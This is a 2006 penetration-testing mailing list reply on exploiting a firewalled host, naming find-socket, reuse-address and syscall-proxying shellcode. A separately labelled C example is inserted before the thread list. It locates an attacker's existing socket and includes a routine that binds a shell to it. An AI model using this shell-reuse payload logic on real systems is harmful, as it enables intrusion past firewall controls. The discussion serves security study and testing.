Penetration Testing mailing list archives
RE: pushing exploits through the Firewall
From: c.ehlen () bull de
Date: Tue, 14 Feb 2006 12:31:49 +0100
"Mike Gilligan" <mikewgilligan@h An: pen-test () securityfocus com otmail.com> Kopie: Thema: pushing exploits through the Firewall 12.02.2006 09:42 Hi Mike,
I'm curious how it would be possible to launch the exploit against the server when a packet filtering device and stateful inspection Firewall sit between the pentester and the vuln host. It would seem at first glance that this is not a viable option. How else might one go about exploiting the vuln?
In issue 62 of Phrack magazine you can find an article called "Advances_in_Windows_Shellcode" by sk (http://www.phrack.org/phrack/62/p62-0x07_Advances_in_Windows_Shellcode.txt). Here is an abstract of the abstract:

"Firewall is everywhere in the Internet now. Most of the exploits released in the public have little concern over firewall rules because they are just proof of concept. In real world, we would encounter targets with firewall that will make exploitation harder. We need to overcome these obstacles for a successful penetration testing job. The research of this paper started when we need to take over (own) a machine which is heavily protected with rigid firewall rules. Although we can reach the vulnerable service but the strong firewall rules between us and the server hinder all standard exploits useless."

If we assume that the firewall:

- blocks all ports except the listening port of the service
- blocks all outgoing initial traffic from the target

you can still exploit the target with shellcode and/or a payload using these techniques:

- Find socket shellcode
- Reuse address shellcode
- Syscall proxying

If the filter device is a DPI/ALG system, you can encapsulate the shell communication in the payload of encrypted (steganographic) real-world protocol packets, or maybe use some kind of evasion/mutation code.

I think you will find these exploitation techniques in most exploit frameworks.

Regards,
Christian
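The "find socket" technique from the list above, as an added worked example in plain C for Linux/POSIX. This is not code from the thread or from the Phrack paper: it models what the shellcode does (walk the open descriptors, ask getpeername() for each one's peer, keep the socket whose peer port is the attacker's source port, then hand that socket to a shell) using libc calls instead of raw syscalls, and it builds its own loopback connection in-process so it can be run offline. The function names, the 1024-descriptor scan limit and the loopback fixture are assumptions made for the example.

```c
/* Added example: userland model of "find socket" shellcode (Linux/POSIX).
 * The attacker already has an established, firewall-permitted TCP
 * connection to the vulnerable service and knows its own source port.
 * Instead of opening a new connection (blocked), the payload locates that
 * existing socket by its peer port and reuses it. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define MAX_FD 1024  /* assumption: scan the default descriptor table size */

/* Scan descriptors 0..MAX_FD-1 and return the connected IPv4 TCP socket
 * whose peer port (host byte order) is peer_port, or -1 if none matches.
 * getpeername() fails on non-sockets (ENOTSOCK), closed fds (EBADF) and
 * unconnected sockets (ENOTCONN); those are simply skipped. */
int find_socket_by_peer_port(uint16_t peer_port)
{
    for (int fd = 0; fd < MAX_FD; fd++) {
        struct sockaddr_in peer;
        socklen_t len = sizeof(peer);
        memset(&peer, 0, sizeof(peer));
        if (getpeername(fd, (struct sockaddr *)&peer, &len) != 0)
            continue;
        if (peer.sin_family == AF_INET && ntohs(peer.sin_port) == peer_port)
            return fd;
    }
    return -1;
}

/* Constructed fixture (not part of any exploit): listen on 127.0.0.1 on an
 * ephemeral port, connect to it from this same process, accept.
 * *server_fd is the "victim's" accepted socket, *client_fd the "attacker's"
 * side. Returns the attacker's source port in host order, 0 on error. */
uint16_t make_loopback_connection(int *server_fd, int *client_fd)
{
    struct sockaddr_in addr;
    socklen_t alen = sizeof(addr);
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0) return 0;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;  /* kernel picks the listening port */
    if (bind(lfd, (struct sockaddr *)&addr, sizeof(addr)) != 0 ||
        listen(lfd, 1) != 0 ||
        getsockname(lfd, (struct sockaddr *)&addr, &alen) != 0) {
        close(lfd);
        return 0;
    }
    int cfd = socket(AF_INET, SOCK_STREAM, 0);
    if (cfd < 0 || connect(cfd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
        if (cfd >= 0) close(cfd);
        close(lfd);
        return 0;
    }
    int sfd = accept(lfd, NULL, NULL);
    close(lfd);  /* listener no longer needed; the accepted socket survives */
    struct sockaddr_in local;
    socklen_t llen = sizeof(local);
    if (sfd < 0 || getsockname(cfd, (struct sockaddr *)&local, &llen) != 0) {
        close(cfd);
        if (sfd >= 0) close(sfd);
        return 0;
    }
    *server_fd = sfd;
    *client_fd = cfd;
    return ntohs(local.sin_port);
}

/* What the payload does once it has the fd: dup it over stdin/stdout/stderr
 * and exec a shell, so the shell talks over the existing connection.
 * Only returns (with -1) if dup2() or execve() fails. */
int attach_shell_to_socket(int fd, const char *shell)
{
    for (int i = 0; i < 3; i++)
        if (dup2(fd, i) < 0) return -1;
    char *const argv[] = { (char *)shell, NULL };
    execve(shell, argv, NULL);
    return -1;
}

/* Returns 1 if the scan finds exactly the victim-side socket and finds
 * nothing once the connection is closed, 0 otherwise. */
int run_find_socket_demo(void)
{
    int sfd, cfd;
    uint16_t attacker_port = make_loopback_connection(&sfd, &cfd);
    if (attacker_port == 0) return 0;
    int found = find_socket_by_peer_port(attacker_port);
    int ok = (found == sfd && found != cfd);
    /* A real exploit would now call attach_shell_to_socket(found, "/bin/sh"). */
    close(cfd);
    close(sfd);
    if (find_socket_by_peer_port(attacker_port) != -1) ok = 0;
    return ok;
}

int main(void)
{
    int ok = run_find_socket_demo();
    printf("find-socket demo: %s\n", ok ? "victim socket located" : "FAILED");
    return ok ? 0 : 1;
}
```

The sk paper's Windows version does the same scan over socket handles with WSA calls; on either platform the lookup key is the attacker's source port, which is why the exploit must know (or choose, via a bound source port) which port it connected from. The reuse-address variant instead closes the service's listener and re-binds the same port with SO_REUSEADDR, and syscall proxying forwards individual system calls over the same connection; both reuse the one path the firewall already allows.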
Current thread:
- pushing exploits through the Firewall Mike Gilligan (Feb 12)
- RE: pushing exploits through the Firewall Enrique A. Sanchez Montellano (Feb 12)
- <Possible follow-ups>
- RE: pushing exploits through the Firewall c . ehlen (Feb 15)
- RE: pushing exploits through the Firewall Evans, Arian (Feb 15)